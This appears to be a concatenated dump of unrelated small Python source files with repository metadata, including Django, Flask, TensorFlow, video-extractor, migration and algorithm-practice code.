f24b3f14135d3f1b45ea5d6db99c90f6f40d2065 | 4e009430fa206297f5bb187beeca5e2fac0c65ad | /pycharmprojects/day02/while_guess.py | de74acd00a1c34036169f8b0ffb9e45b459c1dca | [] | no_license | xzp820017462/node | 6b7e70a45f59652a5147656c9e266e674a688666 | a398cf36eb396ca1e15e548200f7bc2fc8b4f1a8 | refs/heads/master | 2020-03-26T08:10:01.582952 | 2018-08-18T00:38:58 | 2018-08-18T00:38:58 | 144,689,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | import random
all_choices = ['rock', 'scissors', 'paper']
# each entry is a [winner, loser] pair
win_list = [['rock', 'scissors'], ['scissors', 'paper'], ['paper', 'rock']]
prompt = """(0)rock
(1)scissors
(2)paper
"""
running = True
while running:
    computer = random.choice(all_choices)  # fresh computer pick each round
    ind = int(input(prompt))
    player = all_choices[ind]
    print('You played: %s, the computer played: %s' % (player, computer))
    if player == computer:
        print("Draw")
    elif [player, computer] in win_list:
        print("You win")
    else:
        print("You lose")
        running = False
"[email protected]"
] | |
e598d2d16f4d4fd929f60c9f86001ae28269eed5 | 2f168497605c0540ec26406d87ef0ea6c806c72d | /year/serializers.py | e26ac3ceaf997d4d682b2ccfe8b1fff9523c5cd0 | [
"MIT"
] | permissive | djs2082/AttendanceSystem | 4d94301f861d27fce00cf5517e001ec003d100ce | b775b969585239a5fe756b8367c5ac8994d4e347 | refs/heads/master | 2022-12-02T12:52:29.113208 | 2020-08-19T13:06:04 | 2020-08-19T13:06:04 | 286,905,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | from rest_framework import serializers
from year.models import Year
from rest_framework.validators import UniqueValidator
class YearSerializer(serializers.ModelSerializer):
class Meta:
model=Year
        fields = '__all__'
extra_kwargs={
'yearName': {
'validators': [UniqueValidator(queryset = model.objects.all())],
}
}
| [
"[email protected]"
] | |
74ef4e4b15c58a54c7e14377a511efc4bd38750d | 480669ba61d1c8009bd62cebbbd8fc8998431015 | /home/admin.py | a5d5bf683bcf6870c300cbdddc663f1b5577e28a | [] | no_license | anirudhasj441/online_assignment_system | cbfe5cc058d2d42227f4f3d2530e08fc0d24171b | 521e052d33711c5416a91b5a2dc110a14ddd8d59 | refs/heads/master | 2022-12-06T15:16:23.442614 | 2020-08-26T09:37:40 | 2020-08-26T09:37:40 | 282,669,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,277 | py | from django.contrib import admin
from .models import Teacher,Student,Class,Subject
# Register your models here.
class StudentAdmin(admin.ModelAdmin):
list_filter = [
's_class'
]
list_display = [
'pk',
'name',
'control_number',
's_class',
's_roll',
'email',
's_contact',
]
def name(self,obj):
return obj.user.first_name+' '+obj.user.last_name
def control_number(self,obj):
return obj.user.username
def email(self,obj):
return obj.user.email
class TeacherAdmin(admin.ModelAdmin):
list_display = [
'pk',
'name',
'control_number',
'email',
't_contact'
]
def name(self,obj):
return obj.user.first_name+' '+obj.user.last_name
def control_number(self,obj):
return obj.user.username
def email(self,obj):
return obj.user.email
class ClassAdmin(admin.ModelAdmin):
list_display = [
"pk",
"class_name",
"strength",
]
class SubjectAdmin(admin.ModelAdmin):
list_display = [
"pk",
"subject_name",
"class_name"
]
list_filter = [
"class_name"
]
admin.site.register(Student,StudentAdmin)
admin.site.register(Teacher,TeacherAdmin)
admin.site.register(Class,ClassAdmin)
admin.site.register(Subject,SubjectAdmin)
| [
"[email protected]"
] | |
358bf5ff959ce6c82c82df8e666dc0a2879cd61b | 1f2c16ee42b06479e7aed311d929ffe2aa4a9e41 | /question1.py | d727f54736a5c7db95de2cc7937a314919e8217e | [] | no_license | jed1337/web-scraper-analytics | 0574d28aee9c51aa7896a681ef815b2fd35896d9 | 0de007dc55c75fd6160d31cea8f2e2a5c086ad3b | refs/heads/master | 2020-09-21T12:52:36.700765 | 2019-11-29T15:22:04 | 2019-11-29T15:22:04 | 224,795,059 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import seaborn as sns
import csv
def question1():
data = pd.read_csv("consolidated.csv")
top_artists = data[['Artist and Title', 'Year', 'TPts']].sort_values(by=['Year','TPts'],ascending=False).groupby(['Year']).head(5)
print(top_artists.groupby('Artist and Title')['Year'].count())
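
# Minimal entry point (assumes consolidated.csv sits in the working directory):
if __name__ == "__main__":
    question1()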
| [
"[email protected]"
] | |
59fef5c3b034663423b8dcd197f814b2bf15509a | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/pyi/parsing/Simple.pyi | c3ae82f555c05e75c0e78ae12a54514a47b72b29 | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 28 | pyi | def foo(x: int) -> int: ...
| [
"[email protected]"
] | |
a04b8e2cc982c8c13aa5fbb2315a80ff68b48f1c | 10717fe6f68c4ee9bcf27ee62e89581f4a030b8e | /extractor/steam.py | 97a2992bab81e6e997b23532c28022998d9aaf8c | [] | no_license | HagerHosny199/Testing_Project | ff7f9a54b7a213c9d9ade0c5192845c2a29adc8b | 9bc170263e239cc24ccfb2aa33b9913ff799ffe9 | refs/heads/master | 2020-05-17T20:57:01.750640 | 2019-05-08T22:13:06 | 2019-05-08T22:13:06 | 183,954,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,644 | py | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from utils import (
extract_attributes,
ExtractorError,
get_element_by_class,
js_to_json,
)
class SteamIE(InfoExtractor):
_VALID_URL = r"""(?x)
https?://store\.steampowered\.com/
(agecheck/)?
(?P<urltype>video|app)/ #If the page is only for videos or for a game
(?P<gameID>\d+)/?
(?P<videoID>\d*)(?P<extra>\??) # For urltype == video we sometimes get the videoID
|
https?://(?:www\.)?steamcommunity\.com/sharedfiles/filedetails/\?id=(?P<fileID>[0-9]+)
"""
_VIDEO_PAGE_TEMPLATE = 'http://store.steampowered.com/video/%s/'
_AGECHECK_TEMPLATE = 'http://store.steampowered.com/agecheck/video/%s/?snr=1_agecheck_agecheck__age-gate&ageDay=1&ageMonth=January&ageYear=1970'
_TESTS = [{
'url': 'http://store.steampowered.com/video/105600/',
'playlist': [
{
'md5': '6a294ee0c4b1f47f5bb76a65e31e3592',
'info_dict': {
'id': '2040428',
'ext': 'mp4',
'title': 'Terraria 1.3 Trailer',
'playlist_index': 1,
}
},
{
'md5': '911672b20064ca3263fa89650ba5a7aa',
'info_dict': {
'id': '2029566',
'ext': 'mp4',
'title': 'Terraria 1.2 Trailer',
'playlist_index': 2,
}
}
],
'info_dict': {
'id': '105600',
'title': 'Terraria',
},
'params': {
'playlistend': 2,
}
}, {
'url': 'http://steamcommunity.com/sharedfiles/filedetails/?id=242472205',
'info_dict': {
'id': 'X8kpJBlzD2E',
'ext': 'mp4',
'upload_date': '20140617',
'title': 'FRONTIERS - Trapping',
'description': 'md5:bf6f7f773def614054089e5769c12a6e',
'uploader': 'AAD Productions',
'uploader_id': 'AtomicAgeDogGames',
}
}]
def _real_extract(self, url):
m = re.match(self._VALID_URL, url)
fileID = m.group('fileID')
if fileID:
videourl = url
playlist_id = fileID
else:
gameID = m.group('gameID')
playlist_id = gameID
videourl = self._VIDEO_PAGE_TEMPLATE % playlist_id
self._set_cookie('steampowered.com', 'mature_content', '1')
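        # Pre-setting the mature_content cookie skips Steam's age gate for most
        # titles; the explicit agecheck URL below handles the remaining cases.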
webpage = self._download_webpage(videourl, playlist_id)
if re.search('<h2>Please enter your birth date to continue:</h2>', webpage) is not None:
videourl = self._AGECHECK_TEMPLATE % playlist_id
self.report_age_confirmation()
webpage = self._download_webpage(videourl, playlist_id)
flash_vars = self._parse_json(self._search_regex(
r'(?s)rgMovieFlashvars\s*=\s*({.+?});', webpage,
'flash vars'), playlist_id, js_to_json)
playlist_title = None
entries = []
if fileID:
playlist_title = get_element_by_class('workshopItemTitle', webpage)
for movie in flash_vars.values():
if not movie:
continue
youtube_id = movie.get('YOUTUBE_VIDEO_ID')
if not youtube_id:
continue
entries.append({
'_type': 'url',
'url': youtube_id,
'ie_key': 'Youtube',
})
else:
playlist_title = get_element_by_class('apphub_AppName', webpage)
for movie_id, movie in flash_vars.items():
if not movie:
continue
video_id = self._search_regex(r'movie_(\d+)', movie_id, 'video id', fatal=False)
title = movie.get('MOVIE_NAME')
if not title or not video_id:
continue
entry = {
'id': video_id,
'title': title.replace('+', ' '),
}
formats = []
flv_url = movie.get('FILENAME')
if flv_url:
formats.append({
'format_id': 'flv',
'url': flv_url,
})
highlight_element = self._search_regex(
r'(<div[^>]+id="highlight_movie_%s"[^>]+>)' % video_id,
webpage, 'highlight element', fatal=False)
if highlight_element:
highlight_attribs = extract_attributes(highlight_element)
if highlight_attribs:
entry['thumbnail'] = highlight_attribs.get('data-poster')
for quality in ('', '-hd'):
for ext in ('webm', 'mp4'):
video_url = highlight_attribs.get('data-%s%s-source' % (ext, quality))
if video_url:
formats.append({
'format_id': ext + quality,
'url': video_url,
})
if not formats:
continue
entry['formats'] = formats
entries.append(entry)
if not entries:
raise ExtractorError('Could not find any videos')
return self.playlist_result(entries, playlist_id, playlist_title)
| [
"[email protected]"
] | |
4cb5c441bcba23fbc23e5964cb82056ad9278044 | 29b2818a5f336fd10b124871220e047cc86d1d38 | /companies/migrations/0004_auto_20180310_0505.py | 246f298f80c57afc244fcbf917b0cda3900d8f49 | [] | no_license | prsh-singh834006/foundationbackend | d7eebeb17b3d35ad94b8e44c832438b7ebed63e3 | 52c63b77f98e5d2d312d050f0ab2b4dab78368aa | refs/heads/master | 2021-03-30T21:02:17.392653 | 2018-03-10T06:30:45 | 2018-03-10T06:30:45 | 124,621,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # Generated by Django 2.0.3 on 2018-03-10 05:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('companies', '0003_sku_subcategory_subcategory_sku'),
]
operations = [
migrations.DeleteModel(
name='Stock',
),
migrations.DeleteModel(
name='Users',
),
]
| [
"[email protected]"
] | |
2bf169f247955b023ed4eb2ef9238dea4e9d188b | 8b16e83dbc38f6714ee5d9ef9f9b43d16d51f1de | /hello.py | d9c6954e709b320806042665599c2737fb097292 | [] | no_license | shruthasivakumar/my-first-blog | 1ee03faeee4c57da0e8c0e867c58327f9efbbbed | 9595c5015ef1a26ba1393d21fa62d63afcf67634 | refs/heads/master | 2020-03-28T22:15:59.942373 | 2017-06-17T15:47:05 | 2017-06-17T15:47:05 | 94,626,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | def hi(name):
if name == 'Shrutha':
print('Hi Shrutha!')
print('Whats up?')
elif name == 'a':
print ('Hi A!')
else:
print ('Go away random person!')
hi('b')
| [
"[email protected]"
] | |
9b1a62a8beafa47b2bd59dfce771a8e37d810b5c | 53869930bd3989d4ea397b4dce42996fc1a33c1f | /compressed_network/layers/conv_layer.py | 5d3687bed9516fb65533680522f1abfe7e9d94df | [] | no_license | oanaucs/quant | 6e4963b912667f0adfc5e74a2832146f2db2a18d | b31bd8c17e5cf97cf12977f8b490ec33fab02740 | refs/heads/master | 2022-02-22T23:16:28.495165 | 2019-10-09T16:45:22 | 2019-10-09T16:45:22 | 212,675,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,239 | py | from layers.layer import layer_base
import tensorflow as tf
import numpy as np
class conv2d(layer_base):
def __init__(self,
in_depth,
out_depth,
kernel_size=[3, 3],
strides=[1, 1, 1, 1],
padding='SAME',
name=None,
reuse=None,
trainable=True):
self.name = name
self.kernel_size = [kernel_size[0],
kernel_size[1], in_depth, out_depth]
self.trainable = trainable
self.weights = tf.get_variable(name=self.name+'/weights',
shape=self.kernel_size, dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(),
trainable=self.trainable)
self.bias_weights = None
self.values = None
self.strides = strides
self.padding = padding
self.prune_mask = None
self.centroids = []
self.name = name
self.pruned_weights = tf.placeholder(tf.float32, self.weights.get_shape().as_list())
self.assign_op = tf.assign(self.weights, self.pruned_weights)
self.clusters_ph = tf.placeholder(tf.float32, self.weights.get_shape().as_list())
self.assign_clusters_op = tf.assign(self.weights, self.clusters_ph)
self.cast_op = tf.cast(self.weights, tf.int32)
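        # These placeholder/assign pairs let pruning masks and cluster centroids be
        # written into the kernel at session run time without rebuilding the graph.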
def forward(self, input_tensor):
self.values = tf.nn.conv2d(
input_tensor, self.weights, strides=self.strides, padding=self.padding,
name=self.name)
if self.bias_weights is None:
values_shape = self.values.get_shape().as_list()
bias_shape = [values_shape[-1]]
self.bias_weights = tf.get_variable(name=self.name+'/biases',
shape=bias_shape, dtype=tf.float32,
initializer=tf.zeros_initializer(),
trainable=self.trainable)
self.bias_values = tf.nn.bias_add(self.values, self.bias_weights)
self.relu_values = tf.nn.relu(self.bias_values)
return self.relu_values
    def shape(self):
        # Tensor truthiness is undefined in graph mode; compare against None instead.
        if self.values is not None:
            return self.values.get_shape().as_list()
        else:
            return None
| [
"[email protected]"
] | |
f851dbbc0d86bc7b1053d5e0f1308049b8176273 | cab24ce6969b883b259ebf9a3731d913720acb48 | /flask-demos/basic-routing/server.py | b2fcc884ea07527b03c117d8c50dc63db0e20735 | [] | no_license | mgoshorn/191209-content-repo | e7f1a3e5079f60b10443839b13b8fc2d19c4ac63 | a37455dee84e6aa88844b49c961aa4d85181d624 | refs/heads/master | 2020-12-18T12:34:35.909532 | 2020-01-26T16:34:49 | 2020-01-26T16:34:49 | 235,383,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | from flask import Flask
app = Flask(__name__)
cats = ["Felix", "Fluffy", "Max", "Sylvester", "Tom", "Garfield"]
@app.route("/cats", methods=["GET"])
def get_cats():
return {
"data": cats
}
@app.route("/cats/<id>")
def get_cat(id):
if(not id.isnumeric()):
return "", 404
int_id = int(id)
if(int_id < 1 or int_id > len(cats)):
return "", 404
cat = cats[int_id-1]
return cat, 200
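
# Example requests (Flask's default port 5000 assumed):
#   GET /cats    -> {"data": ["Felix", ..., "Garfield"]}
#   GET /cats/2  -> "Fluffy"   (ids are 1-based)
#   GET /cats/99 -> 404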
app.run(debug=True) | [
"[email protected]"
] | |
3e886595d306c6291467f18af56c5f7211ed1485 | 491d5306e68793b57be2a411c32b3f2651486766 | /migrations/versions/11090f350c03_.py | 58d57d0b18ca800d1baaa986fd7d681021a0b48b | [] | no_license | dygksquf5/flask_clone_project_api | 2a0e6db73a93f4e953040626102f16c841468613 | 5c6a0e59ed3b880ff8a3547f2616355262de62e9 | refs/heads/main | 2023-03-25T09:30:05.878500 | 2021-03-24T02:02:02 | 2021-03-24T02:02:02 | 349,996,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | """empty message
Revision ID: 11090f350c03
Revises: 3fe6103ee496
Create Date: 2021-02-25 15:49:05.532642
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '11090f350c03'
down_revision = '3fe6103ee496'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('order_data', sa.Column('menu_id', sa.Integer(), nullable=True))
op.drop_constraint('order_data_menus_id_fkey', 'order_data', type_='foreignkey')
op.create_foreign_key(None, 'order_data', 'menus', ['menu_id'], ['id'])
op.drop_column('order_data', 'menus_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('order_data', sa.Column('menus_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_constraint(None, 'order_data', type_='foreignkey')
op.create_foreign_key('order_data_menus_id_fkey', 'order_data', 'menus', ['menus_id'], ['id'])
op.drop_column('order_data', 'menu_id')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
fc7bec57fc4563f1bbd1ef2298e6effd6d920fbd | 38670d46158fe13f064a6b979110e26b935e459e | /SalesAppDir/SalesApp/wsgi.py | 5b1c6bad6d20e58a577e50ae51abf8e74d697e73 | [] | no_license | UnmsmCc/SalesApp | 1800522bea77ad7b2f09973b5a8601df1689e41f | df9a9e1585c6bbdddb495a2ad1ae1c8383742824 | refs/heads/master | 2022-08-23T12:56:41.961985 | 2020-05-20T21:27:36 | 2020-05-20T21:27:36 | 264,794,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
WSGI config for SalesApp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SalesApp.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
de98ff2cd4ae9314fdce7c59a0f7d52d331e49d4 | a9a0aa5af100ed752194e498b8e14073c13563d2 | /djcelery_errorlog/__init__.py | 529a8aa4b06d4b2e7d6c8097156d5ce395ede83b | [] | no_license | yjmade/django-celery-errorlog | 7948839165ebdbd805fe332fa39b98c9dd0b518b | 32306cfab2e5cb1f48f7692335a03f90379c0e95 | refs/heads/master | 2020-06-13T23:50:26.614640 | 2016-12-05T14:58:01 | 2016-12-05T14:58:01 | 75,542,638 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | # -*- coding: utf-8 -*-
def shared_task(*args, **kwargs):
from .models import CeleryError
return CeleryError.shared_task(*args, **kwargs)
def periodic_task(*args, **kwargs):
from .models import CeleryError
return CeleryError.periodic_task(*args, **kwargs)
| [
"[email protected]"
] | |
2812c81eda3824c27a60a84670e9ab8374c9207c | 03483eb845567a1ea783214c462d7d6ce7b97420 | /done/refiner.py | b8bf0e5b03b71da827b74fd929946af31983f826 | [] | no_license | vishaljain3991/reports2sql | 7a278d820ff65026edfb435822efac24cdd20e70 | 98a340a167501d45f036a8731f41434ea1f2f3f3 | refs/heads/master | 2021-01-01T19:20:33.129205 | 2014-06-27T15:01:56 | 2014-06-27T15:01:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,567 | py | #==========================
#PLEASE READ THE COMMENTS
#==========================
#Now we refine, i.e. clean, our database. This script opens names.txt, which pairs each analyst's
#full name (as it appears in the analysts_YYYY-MM-YY.txt files) with just their first and last name.
#It then replaces every occurrence of an analyst's full name in the database with the
#first and last name.
import nltk
import os
import psycopg2
fo=open("names.txt", "rb+")
raw=fo.read()
conn = psycopg2.connect(database="finance", user="finance", password="iof2014", host="127.0.0.1", port="5432")
cur=conn.cursor()
#We split the text read from names.txt file using \n delimiter.
sents=raw.split('\n')
#Each sentence contains an analyst's full name along with their first and last names. We form a
#dictionary in which the full name points to the first and last name.
index={} #forming a dictionary
for sent in sents:
if(sent!=''):
        #We split every sentence into the full name and the "first and last name"
        #using the '#' delimiter
t=sent.split('#')
index[t[0]]=t[1]
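        # e.g. a (hypothetical) line "Christopher Wimmer, CFA#Christopher Wimmer"
        # yields index['Christopher Wimmer, CFA'] = 'Christopher Wimmer'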
#Using the dictionary keys, we now refine the ratings1 table, reducing each full name to just the first and last name
print index['Christopher Wimmer, CFA']
#'CFA','CPA','Dr.' are additional designations that come with a person's name; we separate them out and
#put them in a separate column called a1_add or a2_add, depending on whether the person was the 1st or 2nd analyst
#on the report.
buzz=['CFA','CPA','Dr.']
for t in index.keys():
tokens=t.split(" ")
#For every full name we determine whether there is anything common between the set of words in token
#and the set of words in buzz. Generally, a name has only one designation if at all it has it. so
#if a name contains a designation the cardinality of intersected set comes out to be greater than or equal
#to one.
inter=list(set(tokens)&set(buzz)) #whether there is some intersection or not
if (len(inter)>0):
        #Next, we put the additional designation in the a1_add or a2_add column for full names that have one
cur.execute("UPDATE RATINGS1 SET A1_ADD='"+inter[0]+"' WHERE A1_NAME='"+t+"';")
conn.commit()
cur.execute("UPDATE RATINGS1 SET A2_ADD='"+inter[0]+"' WHERE A2_NAME='"+t+"';")
conn.commit()
    #Finally we update the a1_name or a2_name column with the "first and last name"
cur.execute("UPDATE RATINGS1 SET A1_NAME='"+index[t]+"' WHERE A1_NAME='"+t+"';")
conn.commit()
cur.execute("UPDATE RATINGS1 SET A2_NAME='"+index[t]+"' WHERE A2_NAME='"+t+"';")
conn.commit()
| [
"[email protected]"
] | |
3412d4feb9073a130e9a20924cf03b2d98444c14 | d8bb500d56d464d710209cfee5bc054b02adcea5 | /JobSchd/migrations/0002_auto_20171002_0016.py | 7306abbf78ebcc018a91e9727d3bf2482c2d291f | [] | no_license | siddarth306/PopGen | fb99cd98e93d5747a325e0a1b07d3ac50ed68428 | 84913d1d0eef9990d6bda956a32286518009298a | refs/heads/master | 2020-04-15T14:15:04.767830 | 2019-01-12T15:51:00 | 2019-01-12T15:51:00 | 164,747,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-02 00:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('JobSchd', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('job_priority', models.CharField(max_length=5)),
('job_name', models.CharField(max_length=50)),
('is_fav', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50)),
('email', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
],
),
migrations.RemoveField(
model_name='jobr',
name='user',
),
migrations.DeleteModel(
name='JobR',
),
migrations.AddField(
model_name='job',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='JobSchd.User'),
),
]
| [
"[email protected]"
] | |
0624cfcab1018e1fa3e300373e429924574f939d | c3f595359487019f807ac2a55f4ccd63cf6df0bf | /fluvirus.py | f0486865368e12fbe677e410276beaeddacfde87 | [] | no_license | afcarl/Influenza-Network-Transmission-Model | 391dbbd0034bf9de8950a17f1bcac68f0481739a | e82e22b153e643ba240b5721b511c6857bd9c049 | refs/heads/master | 2020-03-18T10:03:51.047195 | 2017-11-15T19:19:46 | 2017-11-15T19:19:46 | 134,595,340 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py | class FluVirus(Virus):
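    # NOTE: `Virus` must already be in scope here, e.g. via `from virus import Virus`
    # (the exact module path is an assumption; it is not defined in this file).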
"""docstring for FluVirus"""
def __init__(self, id, creation_date, num_segments=2, parent=None, \
generate_sequence=False):
Virus.__init__(self, id=id, creation_date=creation_date, \
num_segments=num_segments, parent=parent, \
generate_sequence=generate_sequence) | [
"[email protected]"
] | |
0b951d9b1c6371d9c2405c5a067a5b58506d1322 | 902628a75d979c8636efe6ea0aaf616910f88336 | /setup.py | a955c0783c67269cd3aab92bfff811ede6aa37a3 | [] | no_license | jicuss/vertica_parity_env | 59d608bcfbfdaf6c1005a1c1a26d9d2f556ec2ef | f194c7a8797bac1b868f08aba373b84124892676 | refs/heads/master | 2021-01-17T16:04:24.591646 | 2016-08-19T22:18:31 | 2016-08-19T22:18:31 | 63,757,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,943 | py | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
from codecs import open # to maintain consistent encoding. May or may not use. TODO: remove if unused
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'VERSION.txt'), encoding='utf-8') as f:
version = f.read()
setup(name='vertica_parity',
version=version,
description='A set of scripts to setup a local vertica test environment',
# The project's main homepage.
url='https://www.github.com',
author='Joshua Icuss',
author_email='[email protected]',
# Choose your license
license='',
classifiers=[
'Programming Language :: Python :: 2.7',
],
packages=find_packages(exclude=['notes_do_not_include','logs','cache','vertica_parity_environment']),
# Include non-python files found in each package in the install.
include_package_data=True,
package_data={
# If any package contains *.json files, include them:
'': ['*.json', '*.sql', ],
},
install_requires=['pyodbc'],
tests_require=['mock'],
test_suite='tests',
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,tests]
extras_require={
'dev': [
'mock',
],
'rel': [
'mock',
'wheel'
]
},
entry_points={
'console_scripts': [
'parse_workflow=entry_points:parseWorkflow',
'create_copy_commands=entry_points:createCopyCommands',
'generate_example_copy_json=entry_points:generateExampleCopyJSON',
],
},
) | [
"[email protected]"
] | |
1345a55a79a3c655f98786f58ee490a95f15db27 | 17f6881c70401dc63757cc7b5fa4d9dd396689e3 | /src/main/com/libin/yfl/35.py | ff1d09e4298aea219272d6797699a0d458c2ada6 | [] | no_license | BigDataRoad/Algorithm | 0ab493eeb478125b4beb62d78ce18c73e30b0496 | 2f2fb4f4b84f6c9df8adbada63b327c43ce29ddd | refs/heads/master | 2023-07-02T04:06:51.025648 | 2021-07-28T14:04:55 | 2021-07-28T14:04:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | # coding:utf-8
'''
1221. Split a String in Balanced Strings
In a "balanced string", the 'L' and 'R' characters appear the same number of times.
Given a balanced string s, split it into as many balanced strings as possible.
Return the maximum number of balanced strings that can be obtained by splitting.
Example 1:
Input: s = "RLRRLLRLRL"
Output: 4
Explanation: s can be split into "RL", "RRLL", "RL", "RL"; each substring contains equal numbers of 'L' and 'R'.
Example 2:
Input: s = "RLLLLRRRLR"
Output: 3
Explanation: s can be split into "RL", "LLLRRR", "LR"; each substring contains equal numbers of 'L' and 'R'.
Example 3:
Input: s = "LLLLRRRR"
Output: 1
Explanation: s can only be kept as it is, "LLLLRRRR".
'''
class Solution:
def balancedStringSplit(self, s: str) -> int:
r_count = 0
l_count = 0
all_count = 0
for each in s:
if each == 'R':
r_count += 1
elif each == 'L':
l_count += 1
if r_count == l_count:
all_count += 1
r_count = 0
l_count = 0
return all_count
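
# O(n) time, O(1) space. An equivalent view: keep one balance counter (+1 for 'R',
# -1 for 'L'); each time it returns to zero, one balanced piece is complete.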
| [
"[email protected]"
] | |
e4d45620eb41d7e65c1a758b74401b7fa074da8d | 17934999db777fb173c98facb7e90263589d879a | /leetcode/148.py | 8cee1cd0aaa1927cd749f601ca4d1b4df4e43b8d | [] | no_license | helunxing/algs | 2196730bd9daeaecd3504ad84e3e0ddca751953f | ca9629f5bf2177275688d70b12e10e442ad67a84 | refs/heads/main | 2023-02-18T07:03:09.488423 | 2022-05-16T00:18:01 | 2022-05-16T00:18:01 | 136,946,860 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,028 | py | # Definition for singly-linked list.
from typing import List
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution0:
def sortList(self, head: ListNode) -> ListNode:
if not head:
return head
last = fast = slow = head
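        # Fast/slow pointers: fast advances two nodes per loop, so slow stops at the
        # midpoint while `last` trails it, letting us cut the list in half.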
while fast:
last = slow
slow = slow.next
fast = fast.next
fast = fast.next if fast else fast
if fast == slow:
return head
last.next = None
return self.merge(self.sortList(head), self.sortList(slow))
def merge(self, l1, l2):
dummy = curr = ListNode(0)
while l1 and l2:
if l1.val > l2.val:
curr.next = l2
curr = curr.next
l2 = l2.next
else:
curr.next = l1
curr = curr.next
l1 = l1.next
if l1 or l2:
curr.next = l1 if l1 else l2
return dummy.next
nodes = [4, 2, 1, 3]
fast = dummy = ListNode(0)
for i in nodes:
fast.next = ListNode(i)
fast = fast.next
s = Solution0()  # the second Solution class is only defined below this point, so use Solution0 here
ans = s.sortList(dummy.next)
class Solution:
def sortList(self, head: ListNode) -> ListNode:
if not head or not head.next:
return head
last = slow = fast = head
while fast:
last = slow
fast = fast.next
slow = slow.next
fast = fast.next if fast else fast
l1 = head
l2 = last.next
last.next = None
return self.merge(self.sortList(l1), self.sortList(l2))
def merge(self, l1, l2):
dummy = ListNode(0)
curr = dummy
while l1 and l2:
if l1.val > l2.val:
curr.next = l2
l2 = l2.next
else:
curr.next = l1
l1 = l1.next
curr = curr.next
if l1:
curr.next = l1
if l2:
curr.next = l2
return dummy.next
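# Added sanity check (not in the original file): both merge-sort variants
# should sort 4 -> 2 -> 1 -> 3 into 1 -> 2 -> 3 -> 4.
def _to_pylist(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

def _from_pylist(vals):
    d = tail = ListNode(0)
    for v in vals:
        tail.next = ListNode(v)
        tail = tail.next
    return d.next

if __name__ == "__main__":
    assert _to_pylist(Solution0().sortList(_from_pylist([4, 2, 1, 3]))) == [1, 2, 3, 4]
    assert _to_pylist(Solution().sortList(_from_pylist([4, 2, 1, 3]))) == [1, 2, 3, 4]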
| [
"[email protected]"
] | |
8857f76b42fd2327914de953db3299ebc147db0c | e73b68643093aee333254e05658a711c17a656b0 | /authorization/migrations/0009_auto_20210128_0449.py | 92c747acae17c57d832ab97a811ebbd0babc5e25 | [] | no_license | Brahim2007/PaperMetrix | 4d7fe27612066b97f4c824cf233961ca59b95b09 | 8ae8a2e367ba2bab6f271f4f64256f6675b1cf78 | refs/heads/master | 2023-05-25T18:41:16.101357 | 2023-04-29T09:49:21 | 2023-04-29T09:49:21 | 373,526,954 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | # Generated by Django 3.1 on 2021-01-27 23:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('authorization', '0008_auto_20210128_0447'),
]
